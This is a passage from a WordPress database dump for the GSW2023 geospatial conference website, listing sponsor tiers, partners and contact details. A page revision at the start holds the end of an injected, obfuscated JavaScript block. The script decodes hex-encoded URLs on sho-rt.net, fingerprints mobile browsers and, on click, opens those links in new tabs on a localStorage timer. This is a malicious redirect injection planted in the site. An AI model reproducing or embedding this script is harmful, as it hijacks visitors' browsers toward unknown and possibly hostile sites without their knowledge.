_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-09-04 10:48:31','2023-09-04 10:48:31','',3066,'https://gsw2023.com/?p=5452',0,'revision','',0),
(5453,1,'2023-09-04 12:50:04','2023-09-04 12:50:04','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"]<p><a href=\"https://www.esri.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 